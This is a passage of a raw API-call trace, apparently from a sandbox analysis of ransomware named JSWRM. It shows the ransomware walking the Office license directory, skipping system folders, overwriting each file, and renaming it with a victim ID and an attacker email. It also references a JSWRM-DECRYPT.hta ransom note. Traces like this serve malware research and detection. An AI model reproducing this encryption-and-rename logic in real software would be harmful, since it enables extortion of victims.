RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0103.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0103.922] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0103.922] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0103.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0103.922] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0103.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0103.922] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0103.923] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0103.923] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0103.923] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0103.923] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0103.923] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe4881625, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe4881625, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe498c694, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2ba7, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MondoR_BypassTrial180-pl.xrm-ms", cAlternateFileName="MONDOR~1.XRM")) returned 1 [0103.923] lstrcmpiW (lpString1="MondoR_BypassTrial180-pl.xrm-ms", lpString2=".") returned 1 [0103.923] lstrcmpiW (lpString1="MondoR_BypassTrial180-pl.xrm-ms", lpString2="..") returned 1 [0103.923] lstrcmpiW (lpString1="MondoR_BypassTrial180-pl.xrm-ms", lpString2="...") returned 1 [0103.923] lstrcmpiW (lpString1="MondoR_BypassTrial180-pl.xrm-ms", lpString2="windows") returned -1 [0103.923] lstrcmpiW (lpString1="MondoR_BypassTrial180-pl.xrm-ms", lpString2="recovery") returned -1 [0103.923] lstrcmpiW (lpString1="MondoR_BypassTrial180-pl.xrm-ms", lpString2="perflogs") returned -1 [0103.923] lstrcmpiW (lpString1="MondoR_BypassTrial180-pl.xrm-ms", lpString2="documents and settings") returned 1 [0103.923] lstrcmpiW (lpString1="MondoR_BypassTrial180-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0103.923] lstrcmpiW (lpString1="MondoR_BypassTrial180-pl.xrm-ms", lpString2="system volume information") returned -1 [0103.923] lstrcmpiW (lpString1="MondoR_BypassTrial180-pl.xrm-ms", lpString2="msocache") returned -1 [0103.923] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0103.923] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_BypassTrial180-pl.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0103.923] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0103.923] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_BypassTrial180-pl.xrm-ms", cchWideChar=31, lpMultiByteStr=0x240ef8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_BypassTrial180-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0103.924] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0103.924] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0103.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_BypassTrial180-pl.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0103.924] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0103.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_BypassTrial180-pl.xrm-ms", cchWideChar=31, lpMultiByteStr=0x2410d8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_BypassTrial180-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0103.924] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0103.924] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0103.924] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0103.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0103.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0103.924] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0103.924] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_BypassTrial180-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_bypasstrial180-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0103.924] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11175) returned 1 [0103.924] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.924] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2ba0) returned 0x24c1d0 [0103.924] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2ba0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2ba0, lpOverlapped=0x0) returned 1 [0103.926] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.927] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2ba0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2ba0, lpOverlapped=0x0) returned 1 [0103.927] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0103.927] CloseHandle (hObject=0x45c) returned 1 [0103.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0103.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0103.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0103.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0103.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0103.928] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0103.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0103.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0103.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0103.928] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0103.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0103.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0103.928] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0103.928] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0103.928] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_BypassTrial180-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_bypasstrial180-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_BypassTrial180-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_bypasstrial180-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0103.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0103.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0103.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0103.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0103.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0103.929] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe4bc8a97, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe4bc8a97, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe4cad862, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x67aa, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MondoR_BypassTrial180-ppd.xrm-ms", cAlternateFileName="MO0B6A~1.XRM")) returned 1 [0103.929] lstrcmpiW (lpString1="MondoR_BypassTrial180-ppd.xrm-ms", lpString2=".") returned 1 [0103.929] lstrcmpiW (lpString1="MondoR_BypassTrial180-ppd.xrm-ms", lpString2="..") returned 1 [0103.929] lstrcmpiW (lpString1="MondoR_BypassTrial180-ppd.xrm-ms", lpString2="...") returned 1 [0103.929] lstrcmpiW (lpString1="MondoR_BypassTrial180-ppd.xrm-ms", lpString2="windows") returned -1 [0103.929] lstrcmpiW (lpString1="MondoR_BypassTrial180-ppd.xrm-ms", lpString2="recovery") returned -1 [0103.929] lstrcmpiW (lpString1="MondoR_BypassTrial180-ppd.xrm-ms", lpString2="perflogs") returned -1 [0103.929] lstrcmpiW (lpString1="MondoR_BypassTrial180-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0103.929] lstrcmpiW (lpString1="MondoR_BypassTrial180-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0103.929] lstrcmpiW (lpString1="MondoR_BypassTrial180-ppd.xrm-ms", lpString2="system volume information") returned -1 [0103.930] lstrcmpiW (lpString1="MondoR_BypassTrial180-ppd.xrm-ms", lpString2="msocache") returned -1 [0103.930] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0103.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_BypassTrial180-ppd.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0103.930] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0103.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_BypassTrial180-ppd.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22d0a0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_BypassTrial180-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0103.930] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0103.930] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bfb8 [0103.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_BypassTrial180-ppd.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0103.930] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0103.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_BypassTrial180-ppd.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22d0d8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_BypassTrial180-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0103.930] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bfb8 | out: hHeap=0x1e0000) returned 1 [0103.930] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0103.930] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0103.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0103.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0103.930] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0103.930] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_BypassTrial180-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_bypasstrial180-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0103.930] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=26538) returned 1 [0103.931] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.931] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x67a0) returned 0x24c1d0 [0103.931] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x67a0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x67a0, lpOverlapped=0x0) returned 1 [0103.948] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.948] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x67a0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x67a0, lpOverlapped=0x0) returned 1 [0103.948] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0103.948] CloseHandle (hObject=0x45c) returned 1 [0103.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0103.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0103.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0103.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0103.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0103.949] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0103.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0103.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0103.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0103.949] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0103.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0103.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e110 [0103.949] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0103.949] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0103.949] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_BypassTrial180-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_bypasstrial180-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_BypassTrial180-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_bypasstrial180-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0103.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0103.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0103.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0103.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0103.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0103.950] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe4b7c515, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe4b7c515, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe4c6135d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d67, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MondoR_BypassTrial180-ul-oob.xrm-ms", cAlternateFileName="MOAFA6~1.XRM")) returned 1 [0103.950] lstrcmpiW (lpString1="MondoR_BypassTrial180-ul-oob.xrm-ms", lpString2=".") returned 1 [0103.950] lstrcmpiW (lpString1="MondoR_BypassTrial180-ul-oob.xrm-ms", lpString2="..") returned 1 [0103.950] lstrcmpiW (lpString1="MondoR_BypassTrial180-ul-oob.xrm-ms", lpString2="...") returned 1 [0103.950] lstrcmpiW (lpString1="MondoR_BypassTrial180-ul-oob.xrm-ms", lpString2="windows") returned -1 [0103.950] lstrcmpiW (lpString1="MondoR_BypassTrial180-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0103.951] lstrcmpiW (lpString1="MondoR_BypassTrial180-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0103.951] lstrcmpiW (lpString1="MondoR_BypassTrial180-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0103.951] lstrcmpiW (lpString1="MondoR_BypassTrial180-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0103.951] lstrcmpiW (lpString1="MondoR_BypassTrial180-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0103.951] lstrcmpiW (lpString1="MondoR_BypassTrial180-ul-oob.xrm-ms", lpString2="msocache") returned -1 [0103.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0103.951] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_BypassTrial180-ul-oob.xrm-ms", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0103.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0103.951] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_BypassTrial180-ul-oob.xrm-ms", cchWideChar=35, lpMultiByteStr=0x22cdc8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_BypassTrial180-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 35 [0103.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0103.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0103.951] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_BypassTrial180-ul-oob.xrm-ms", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0103.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0103.951] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_BypassTrial180-ul-oob.xrm-ms", cchWideChar=35, lpMultiByteStr=0x22d0a0, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_BypassTrial180-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 35 [0103.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0103.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0103.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0103.951] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0103.951] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0103.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0103.951] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_BypassTrial180-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_bypasstrial180-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0103.952] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11623) returned 1 [0103.952] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d60) returned 0x24c1d0 [0103.952] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d60, lpOverlapped=0x0) returned 1 [0103.955] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.955] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d60, lpOverlapped=0x0) returned 1 [0103.955] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0103.955] CloseHandle (hObject=0x45c) returned 1 [0103.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0103.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, 